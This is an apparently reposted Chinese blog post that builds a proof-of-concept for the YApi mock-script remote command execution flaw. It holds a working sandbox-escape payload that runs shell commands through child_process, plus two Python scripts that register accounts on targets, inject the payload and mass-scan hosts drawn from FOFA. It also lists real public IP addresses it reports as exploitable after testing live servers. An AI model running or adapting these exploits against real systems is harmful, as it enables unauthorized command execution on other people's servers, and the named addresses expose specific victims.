编写Poc:Yapi远程命令执行漏洞
Posted hunpi
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了编写Poc:Yapi远程命令执行漏洞相关的知识,希望对你有一定的参考价值。
使用Docker构建Yapi(Ubuntu环境)
(1)创建mongoDB数据卷:
docker volume create mongo_data_yapi
(2)启动MongoDb
docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo
(3)从阿里云仓库获取yapi镜像
docker pull registry.cn-hangzhou.aliyuncs.com/anoy/yapi
(4)初始化Yapi数据库索引,以及管理员账号
# 初始化管理员账号成功,账号名:"admin@admin.com",密码:"ymfe.org"
docker run -it --rm --link mongo-yapi:mongo --entrypoint npm --workdir /api/vendors registry.cn-hangzhou.aliyuncs.com/anoy/yapi run install-server
(5)创建yapi容器并启动
docker run -d --name yapi --link mongo-yapi:mongo --workdir /api/vendors -p 3000:3000 registry.cn-hangzhou.aliyuncs.com/anoy/yapi server/app.js
通过ip:3000访问yapi服务。
访问yapi镜像,测试漏洞
(1)进入镜像
docker exec -it 32a744965b59097cbe03042c2a9bc4c95dcc48e2a0b904a73ab57396facb01e8 /bin/sh
查看ip地址
ip address # 172.17.0.3/16
配置Tunnelblick,使用Mac宿主机访问docker靶场成功。
(2)手动添加项目和接口,输入脚本,成功执行命令。
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()
自动化探测脚本
FOFA批量探测(python3)
# -*- coding: utf-8 -*-
import json
import requests
group_id = ''
project_id = ''
catid = ''
unique = ''
import random
def random_str(): # 生成3位的随机字符串,避免注册邮箱和用户名重复
randomStr = ""
strData = 'abcdefghijklmnopqrstuvwxyz'
randomStr += random.choice(strData) + random.choice(strData) + random.choice(strData)
return randomStr
def be_register(url):
global unique
url = url + "/api/user/reg"
header = {
'Content-Type': 'application/json;charset=utf-8'
}
unique = random_str()
data = '{"email":"' + unique + 'test@163.com","password":"test", "username":"' + unique + 'test"}'
try:
print(url)
res = requests.post(url=url, headers=header, data=data, timeout=5)
print(res.text)
print(res.status_code)
if '"errmsg":"成功!' in res.text:
return 1
else:
print(url + " 111not support register.")
except:
print(url + " 222not support register.")
session = requests.Session()
def login(url):
url = url + "/api/user/login"
header = {
'Content-Type': 'application/json;charset=utf-8'
}
data = '{"email":"' + unique + 'test@163.com","password":"test"}'
logingo = session.post(url=url, headers=header, data=data)
# print(logingo.text)
def add(gurl):
global group_id, project_id, catid
header = {
'Content-Type': 'application/json;charset=utf-8'
}
turl = gurl + "/api/group/get_mygroup"
t1 = session.get(url=turl, timeout=5)
group_id = json.loads(t1.text)['data']['_id']
url1 = gurl + "/api/project/add"
data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
add1 = session.post(url=url1, headers=header, data=data1, timeout=5)
turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
t2 = session.get(url=turl2, timeout=5)
project_id = json.loads(t2.text)['data']['list'][0]['_id']
turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
t3 = session.get(url=turl3, timeout=5)
catid = json.loads(t3.text)['data'][0]['_id']
url2 = gurl + "/api/interface/add"
data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
# print(data1)
add2 = session.post(url=url2, headers=header, data=data2, timeout=5)
def run(gurl, exec):
turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
t1 = session.get(url=turl, timeout=5)
interface_id = json.loads(t1.text)['data']['list'][0]['_id']
url = gurl + "/api/plugin/advmock/save"
data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
interface_id) + '''","mock_script":"const sandbox = this\\\\nconst ObjectConstructor = this.constructor\\\\nconst FunctionConstructor = ObjectConstructor.constructor\\\\nconst myfun = FunctionConstructor('return process')\\\\nconst process = myfun()\\\\nmockJson = process.mainModule.require(\\\\"child_process\\\\").execSync(\\\\"''' + exec + '''\\\\").toString()","enable":true}'''
header = {
'Content-Type': 'application/json;charset=utf-8'
}
cmd = session.post(url=url, data=data, headers=header, timeout=5)
# print(cmd.text)
result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1", timeout=5)
if(("eth0" in result.text) or ("root" in result.text)):
print("===============>存在漏洞:" + gurl + "/mock/" + str(project_id) + "/1/1")
else:
print("=====不存在漏洞" + gurl + "/mock/" + str(project_id) + "/1/1")
def be_connect(url):
try:
requests.get(url, timeout=5)
return 1
except:
print(url + " 无法连接")
if __name__ == '__main__':
session = requests.Session()
exec = 'whoami & ifconfig || ipconfig'
with open('FOFA_Yapi_1-11.txt', 'r') as f:
mylist = f.read()
mylist = mylist.split('\\n')
f.close()
for url in mylist:
if "http" not in url:
url = "http://" + url
if(be_connect(url) == 1):
if(be_register(url) == 1):
login(url)
try:
add(url)
run(url, exec)
except:
print("add/run函数错误"+ url)
# 误报率很高:
# Not support register :http://52.80.250.134:3005。手工测试,存在漏洞。
# 还有一些是可以注册,但是运行报告称:不支持注册。
'''
存在漏洞:
自动检测
http://123.14.120.254:14000/api/plugin/advmock/save
手测:
http://52.80.250.134:3005
http://1.117.246.169:3000
http://47.119.175.250:3001/mock/195/test/test
新脚本测试100站点:
===============>存在漏洞:http://1.117.139.96:3000/mock/31/1/1
===============>存在漏洞:http://122.112.140.186:3001/mock/218/1/1
===============>存在漏洞:http://114.116.97.101:3000/mock/137/1/1
'''
# 点击mock链接可能报错:{"errcode":400,"errmsg":"解析出错,请检查。Error: Cannot read property 'require' of undefined","data":null}
单url探测(python2)
#! -*- coding:utf-8 -*-
import sys
from sys import path;path.append("..")
from lib.DDRequests import DDRequests,ddheaders
from lib.log import log
import requests
import random
import json
def random_str(): # 生成3位的随机字符串,避免注册邮箱和用户名重复
randomStr = ""
strData = 'abcdefghijklmnopqrstuvwxyz'
randomStr += random.choice(strData) + random.choice(strData) + random.choice(strData)
return randomStr
def be_register(url):
global unique
url = url + "/api/user/reg"
header = {
"Content-Type": "application/json;charset=UTF-8"
}
unique = random_str()
data = '{"email":"' + unique + 'test@163.com","password":"test", "username":"' + unique + 'test"}'
try:
# res = requests.post(url=url, headers=header, data=data, proxies=proxies, timeout=5)
res = requests.post(url=url, data=data, headers=header, timeout=5)
flag = res.content.find('成功')
if flag != -1:
return 1
else:
log("[Yapi_Remote Command Execute] %s is not exists 真没有" % (url), "Info")
# except Exception:
except ZeroDivisionError, reason:
log("[Yapi_Remote Command Execute] %s is not exists 异常导致没有" % (url), "Info")
session = requests.Session()
def login(url):
url = url + "/api/user/login"
header = {
'Content-Type': 'application/json;charset=utf-8'
}
data = '{"email":"' + unique + 'test@163.com","password":"test"}'
logingo = session.post(url=url, headers=header, data=data)
# print(logingo.text)
def add(gurl):
global group_id, project_id, catid
header = {
'Content-Type': 'application/json;charset=utf-8'
}
turl = gurl + "/api/group/get_mygroup"
t1 = session.get(url=turl, timeout=5)
group_id = json.loads(t1.text)['data']['_id']
url1 = gurl + "/api/project/add"
data1 = '{"name":"1","basepath":"/1","group_id":"' + str(
group_id) + '","icon":"code-o","color":"green","project_type":"private"}'
add1 = session.post(url=url1, headers=header, data=data1, timeout=5)
turl2 = gurl + "/api/project/list?group_id=" + str(group_id) + "&page=1&limit=10"
t2 = session.get(url=turl2, timeout=5)
project_id = json.loads(t2.text)['data']['list'][0]['_id']
turl3 = gurl + "/api/interface/list_menu?project_id=" + str(project_id) + ""
t3 = session.get(url=turl3, timeout=5)
catid = json.loads(t3.text)['data'][0]['_id']
url2 = gurl + "/api/interface/add"
data2 = '{"method":"GET","catid":"' + str(catid) + '","title":"1","path":"/1","project_id":' + str(project_id) + '}'
# print(data1)
add2 = session.post(url=url2, headers=header, data=data2, timeout=5)
def run(gurl, Myexec):
WEAK_RESULT_DICT = {
"type_f": "webweak",
"data": "",
"url": "",
"resp_header": "",
"resp_body": "",
}
turl = gurl + "/api/interface/list?page=1&limit=20&project_id=" + str(project_id) + ""
t1 = session.get(url=turl, timeout=5)
interface_id = json.loads(t1.text)['data']['list'][0]['_id']
url = gurl + "/api/plugin/advmock/save"
data = '''{"project_id":"''' + str(project_id) + '''","interface_id":"''' + str(
interface_id) + '''","mock_script":"const sandbox = this\\\\nconst ObjectConstructor = this.constructor\\\\nconst FunctionConstructor = ObjectConstructor.constructor\\\\nconst myfun = FunctionConstructor('return process')\\\\nconst process = myfun()\\\\nmockJson = process.mainModule.require(\\\\"child_process\\\\").execSync(\\\\"''' + Myexec + '''\\\\").toString()","enable":true}'''
header = {
'Content-Type': 'application/json;charset=utf-8'
}
cmd = session.post(url=url, data=data, headers=header, timeout=5)
# print(cmd.text)
result = requests.get(url=gurl + "/mock/" + str(project_id) + "/1/1", timeout=5)
# print gurl + "/mock/" + str(project_id) + "/1/1"
code = result.status_code
content = result.text
if(("eth0" in result.text) or ("root" in result.text)):
log("[Yapi_Remote Command Execute] %s is exists" % (gurl + "/mock/" + str(project_id) + "/1/1"), "Warning")
# print("===============>存在漏洞:" + gurl + "/mock/" + str(project_id) + "/1/1")
WEAK_RESULT_DICT["url"] = gurl + "/mock/" + str(project_id) + "/1/1"
WEAK_RESULT_DICT["data"] = content
WEAK_RESULT_DICT["resp_header"] = result.headers
WEAK_RESULT_DICT["resp_body"] = result.text
return WEAK_RESULT_DICT
# else:
# log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
# # print("=====不存在漏洞" + gurl + "/mock/" + str(project_id) + "/1/1")
def crack(type_, domain, ip, port):
# 定义要返回的字典
WEAK_RESULT_DICT = {
"type_f": "webweak",
"data": "",
"url": "",
"resp_header": "",
"resp_body": "",
}
url = type_ + "://" + domain + ":" + str(port)
Myexec = 'whoami & ifconfig || ipconfig'
try:
if be_register(url):
try:
login(url)
add(url)
WEAK_RESULT_DICT = run(url, Myexec)
except:
log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
except:
log("[Yapi_Remote Command Execute] %s is not exists" % (url), "Info")
return WEAK_RESULT_DICT
if __name__ == "__main__":
# crack(sys.argv[1], sys.argv[2], sys.argv[2], sys.argv[3])
# crack("http", "122.112.140.186", "122.112.140.186", "3001")
# 测试用例:
crack("http", "182.254.246.76", "182.254.246.76", "8082")
脚本运行效果如下。
参考
《Yapi远程命令执行漏洞》,2021-07
https://mp.weixin.qq.com/s/BegDH04rbVAGQ_uDSihSZg。
以上是关于编写Poc:Yapi远程命令执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章
Struts2 基于Jakarta的远程命令执行漏洞(附Poc&Exp)
Struts2再爆远程命令执行漏洞![W3bSafe]Struts2-048 Poc Shell及防御修复方案抢先看!
更新Struts2爆远程代码执行漏洞(S2-045),附POC
更新:有POC发布 | Microsoft IE jscript远程命令执行0day漏洞(CVE-2020-0674)通告